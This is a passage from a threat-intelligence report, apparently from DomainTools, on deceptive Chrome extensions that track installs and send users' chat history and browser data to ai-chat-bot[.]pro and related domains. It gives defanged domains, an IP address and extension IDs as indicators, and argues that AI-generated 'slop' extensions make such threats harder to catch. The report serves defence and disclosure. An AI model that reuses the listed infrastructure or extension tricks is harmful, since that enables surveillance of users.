A background script directs users to pages hosted on the same suspicious ai-chat-bot[.]pro domain upon extension installation (welcome page) and sets it as the target URL upon uninstallation. This allows the external server to track install/uninstall events.

The code opens a new tab that loads the following page:

This page then sets multiple Yandex tracking cookies without permissions and retrieves browser information from the user.

Even without overtly malicious intent, the observed review manipulation and external transmission of the user’s IP, browser information and associated chat history raise concerns. This grants the website owner access to sensitive user interactions, a potentially serious issue given the increasing data leakage associated with AI productivity tools. The rapid adoption of AI integrations, facilitated by accessible browser extensions, can lead to a gradual erosion of security practices as users develop a false sense of trust. This "out of sight, out of mind" mentality risks exposing sensitive data, such as code, personal searches, and AI chatbot inputs, to malicious third parties who may engage in eavesdropping, data selling, or exploitation.

Looking For More: Domain Registration Patterns

• IP Resolved: 164.90.199[.]205
• IP ISP: DigitalOcean LLC
• Use Yandex Trackers: 99419511 / 99794673 / 99764413
• Registrar: Porkbun LLC
• SSL Issuer: R10 /  R11
• NameServer Domain: messagingengine[.]com
• Server Type: Apache/2.4.52 (Ubuntu)
• MX Domain: messagingengine[.]com

‍

	Domain: ai-sentence-rewriter[.]com Extension Name: ai-sentence-rewriter Extension ID: ihdnbohcfnegemgomjcpckmpnkdgopon
	pdf-to-jpg[.]app Extension Name: convert-pdf-to-jpg Extension ID: oeefjlikahigmlnplgijgeeecbpemhip
	Domain: htmlvalidator[.]app Extension Name: html-validator Extension ID: aofddmgnidinflambjlfkpboeamdldbd
	Domain: email-checker[.]pro Extension Name: email-checker-verify-emai Extension ID: eheagnmidghfknkcaehacggccfiidhik
	Domain: u99[.]pro Extension Name: link-shortener Extension ID: oliiideaalkijolilhhaibhbjfhbdcnm

‍

AI Slop

"AI Slop" refers to low-quality, often generic and repetitive content, including text and images, generated by artificial intelligence, indicating a lack of human oversight and effort. In this case, the presence of many uniformly structured websites, each with minimal, repetitive content and duplicated code across their associated browser extensions, may suggest it is the product of AI Slop. The generic stock imagery, boilerplate text, and superficial explanations of extension functionality, align with the definition, indicating a potential reliance on automated AI generation rather than thoughtful development.

A Surge in AI Slop

Continuing our exploration of the digital landscape, we now see a new element stirring the garden: a surge of growth we might call "AI Slop." This refers to the rapidly increasing volume of apps and extensions, often born with the assistance of artificial intelligence, that flood the digital stores without the careful cultivation of thoughtful development, particularly around ethical considerations, privacy and security.

This influx amplifies the transient nature of the deceptive Chrome extensions we've discussed. AI tools can accelerate their creation and deployment, leading to a more rapid cycle of appearance, exploitation, and eventual detection. The digital garden becomes overgrown, making it harder to discern the true blooms from the weeds.

Deceptions and user risks over privacy and security we observe in hand-crafted malicious extensions can be magnified in those influenced by AI Slop. While AI can generate code quickly, it might lack the nuanced understanding of security vulnerabilities or the ethical considerations that human developers often bring. This can result in extensions riddled with unintentional flaws that are nonetheless exploitable, or even intentionally deceptive features woven into the code with algorithmic efficiency.

The "aspirations" of these AI-assisted deceptive extensions might be less about ingenious design and more about sheer volume. The ease with which they can be generated lowers the barrier for malicious actors, potentially leading to a flood of mediocre but still harmful extensions aimed at overwhelming users and security systems alike. The digital storefronts become crowded marketplaces where discerning genuine value from deceptive imitation becomes an increasingly difficult task for the average user.

The human experience is significantly impacted by this AI Slop. Users, already faced with a bewildering array of choices, are now confronted with an even greater volume of extensions and apps, many of them indistinguishable from legitimate options at a glance. The ability to pick the "perfect" extension becomes an exercise in futility, as the sheer quantity dilutes the quality and increases the risk of encountering a deceptive one. This overabundance erodes trust not just in individual extensions and apps, but in the platforms themselves.

The forces of security now face an even greater challenge. The volume and rapid evolution of AI-Slop-driven extensions and apps make detection and mitigation a constant uphill battle. Traditional signature-based approaches struggle to keep pace with the algorithmic generation of new threats. The gardeners of the digital space must now adapt to a landscape where weeds can sprout with unprecedented speed and in overwhelming numbers.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DeceptiveBrowserExtensions-AISlop

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.